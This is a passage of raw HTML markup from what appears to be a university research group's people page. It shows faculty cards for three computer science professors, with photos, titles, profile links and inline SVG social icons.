29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c461-outer\">\n <div data-colibri-id=\"182-c461\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c461 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c462\" class=\"d-block style-973 style-local-182-c462 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c462-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c462-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c463\" class=\"h-global-transition-all h-heading style-974 style-local-182-c463 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c463\">\n <!---->\n <!---->\n <h4 class=\"\">Murray Patterson</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c464\" class=\"h-text h-text-component style-975 style-local-182-c464 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Assistant Professor </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c465\" class=\"h-text h-text-component style-976 style-local-182-c465 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c466\" class=\"style-977 style-local-182-c466 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c467-outer\">\n <div data-colibri-id=\"182-c467\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c467 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c468\" class=\"d-block style-973 style-local-182-c468 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c468-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c468-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c469\" class=\"h-global-transition-all h-heading style-974 style-local-182-c469 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c469\">\n <!---->\n <!---->\n <h4 class=\"\">Alex Zelikovsky</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c470\" class=\"h-text h-text-component style-975 style-local-182-c470 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Distinguished University Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c471\" class=\"h-text h-text-component style-976 style-local-182-c471 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c472\" class=\"style-977 style-local-182-c472 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c473-outer\">\n <div data-colibri-id=\"182-c473\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c473 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c474\" class=\"d-block style-973 style-local-182-c474 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c474-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c474-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c475\" class=\"h-global-transition-all h-heading style-974 style-local-182-c475 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c475\">\n <!---->\n <!---->\n <h4 class=\"\">Xiaolin Hu</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c476\" class=\"h-text h-text-component style-975 style-local-182-c476 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c477\" class=\"h-text h-text-component style-976 style-local-182-c477 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c478\" class=\"style-977 style-local-182-c478 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" 